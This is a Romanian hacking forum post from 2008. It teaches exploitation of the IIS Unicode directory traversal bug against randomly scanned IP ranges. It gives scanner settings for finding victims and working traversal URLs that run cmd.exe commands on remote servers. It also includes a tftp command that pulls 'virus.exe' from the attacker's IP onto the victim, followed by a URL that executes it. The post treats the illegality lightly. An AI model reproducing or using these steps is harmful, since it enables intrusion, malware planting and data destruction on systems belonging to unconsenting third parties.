code decode bug
despre acest bug : afecteaza TOATE sistemele care au instalat IIS (Internet Information Server) in windows. nu conteaza daca ai ultima versiune de windows xp ... daca instalezi IIS esti vulnerabil.
ce se poate face cu acest bug :
-sa obtii un SHELL
-sa vezi HDD-ul din iexplorer
-sa faci aproape de toate cu fisierele victimei :sa le descarci , sa le modifici ....
-sa sa executi comenzi de sistem (dap ... incluzand sa formatezi HDD-ul ... insa doar idiotii de lameri fac rau in sistemele patrunse ...)
-sa copii in sistemul victimei programe (aici ai o multime de posibilitati ... de la facut un server ftp pana la crearea unui proxy ...facandute anonim de-adevaratelea )
-si multe altele ... Very Happy
fac ceva ilegal ? daca ma prind ....
sa vedem ... din punct de vedere legal ... nu a fost niciodata condamnat nimeni pt realizarea de astfel de atacuri ... insa AU FOST CONDAMNATI pt folosirea de astfel de atacuri cu obiective ilegale (sters arhive , descarcarea bazelor de date ale firmelor ... )
pentru a realiza astfel de atacuri ... intai este nevoie de un scanner ... recomand SSS (shadow security scanner) ... exista si alte scanere ... insa cred ca SSS e cel mai bun ...
aici cateva linkuri de unde sa luati SSS ... programul nu e gratis Very Happy
http://www.freedownloadscenter.com/Network_and_Internet/Misc__Winsock_Tools/Shadow_Security_Scanner.htmlhttp://www.softpedia.com/get/Network-Tools/Network-IP-Scanner/Shadow-Security-Scanner.shtmlhttp://www.brothersoft.com/downloads/shadow-security-scanner.htmlconfiguratie SSS :
1.tools -> Options si punem Threads la 20 si Priority la Lower
2.Tools -> Policies si dam ADD (asta ne permite sa adaugam un nou scenariu adaptat bug-ului nostru) ... asa ca ii punem un nume (de ex CODE-UNICODE) si dam ok
3.in lista din stanga apasam Ports si lasam marcate doar 21 si 80 (in caz ca nu stiti serverele web sunt in portul 80 si serverele FTP in 21) ... ftp nu e neaparat sa fie marcat ... insa poti da peste servere ftp apetisante ... deci recomand sa bifezi si ftp ...
4.apoi in lista de la stanga dati click pe audits.deselectionati tot (click dr si uncheck all) si apoi bifati urmatoarele optiuni:
-FTP Servers si in dreapta Anonymous Write (ne permite sa gasim servere ftp in care sa putem pune arhivele noastre )
-Web Servers si la dreapta IIS Unicode Vulnerable ; Microsoft IIS CGI Filename Decode Error Vulnerability ; Web Server Folder Traversal -NT$ si Web Server Folder Traversal - NT5. (bug-ul nostru)
si dam OK
5.mergem la File->New Session -> Security Scanner.si apare o fereastra , din care selectionam profilul nostru (cel pe care l-am numit CODE-DECODE) si dam NEXT
6.acum ramane doar sa punem ipurile pe care sa le scanam ... normal e sa fie puse la intamplare ... dam ADD IP ZONE si adaugam ipurile
de ex : in primul spatiu punem 195.101.57.0 si in al doilea 195.101.57.254 si dam add , apoi DONE
7.dam START SCAN ... si incepe scanarea ... acum mergeti si beti o cafea ... ca scanatul dureaza ...
8.dupa ce ati terminat de baut cafeaua ... (si eventual s-a terminat si scanatul) verifica lista ... sa-ti dai seama care sunt vunerabile , uitate sa aiba in dreapta o linie rosie (rosu nu portocaliu Smile ).
9.odata gasita victima , uitativa la sectiunea AUDITS (putin mai jos de bara rosie) , si dati click pe Web Servers ISS Unicode Vulnerable si uitativa la script 1 ... da dublu click pe adresa din script 1 si ... esti in hdd-ul victimei ...
"ce tare ... am intrat intr-un sistem ... SUNT UN HACKER !!!"
hai omule nu te emotiona prea tare ... e doar un bug foarte usor si scandalos de Mucosoft (microsoft / bigbrother sau cum il numiti voi)
CODE/DECODE BUG : COMENZI
1.explicatie
ce avem in iexplorer e ceva de genul :
http://195.101.57.8/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\http:// ->nu are nevoie de explicatie ... stie toata lumea ce e (sper)
195.101.57.8 -> ip-ul serverului
/scripts/ -> e un director al serverului web
..%c0%af.. -> asta e bug-ul ...
2.utilizand comenzi
exemple:
-MD c:/newfolder ->creaza un folder in c , care se numeste new folder
si ar fi asa comanda :
ttp://195.101.57.8/scripts/..%c0%af../winnt/system32/cmd.exe?/c+md+c:\newfolder-echo hello>c:\newfolder\proba.txt -> comanda asta creaza in directorul newfolder un fisier text cu numele proba.txt pe care daca il deschizi are scris inauntru hello
ari fi asa :
http://195.101.57.8/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+hello+>c:\newfolder\proba.txt-rd c:\newfolder -sterge folderul newfolder (intai sa fii sigur ca nu e nimic in folder , altfel nu poate fi sters)
ar fi asa:
http://195.101.57.8/scripts/..%c0%af../winnt/system32/cmd.exe?/c+rd+c:\newfolderbanuiesc ca ati prins idea de cum se foloseste ... sunt comenzile din cmd (in caz ca nu stii cmd ... invata cat mai repede ... e ca si cum ai fi analfabet daca nu stii sa folosesti comenzile din cmd)
si acum un exemplu de cum sa copii fisierele tale in sistemul victimei :
http://195.101.57.8/scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe%20-i%20AiciIpulTau%20get%20%20NumeleFisierului.exe(sauOriceAltCeva)%20LoculInCareEsteFisierulPeCareVreiSa-lUrciInServerulVictima(ex:c:\winnt\system32\numelefisierului.exedaca ipul tau ar fi 86.34.123.5 si arhiva ar fi virus.exe , comanda ar fi asa :+
http://195.101.57.8/scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe%20-i%2086.34.123.5%20get%20%20virus.exe%20c:\winnt\system32\virus.exepartea cu urcat arhive e mai complicata ... insa cu putina practica se prinde
sa executi programe urcate in sistemul victimei:
http://195.101.57.8/scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\winnt\system32\virus.exeasadar -locul in care se afla programul si numele programului ...
si cam asta a fost tot
Subiect: intrusiuni prin intermediul bugului code/decode 
Vin Dec 19, 2008 11:27 pm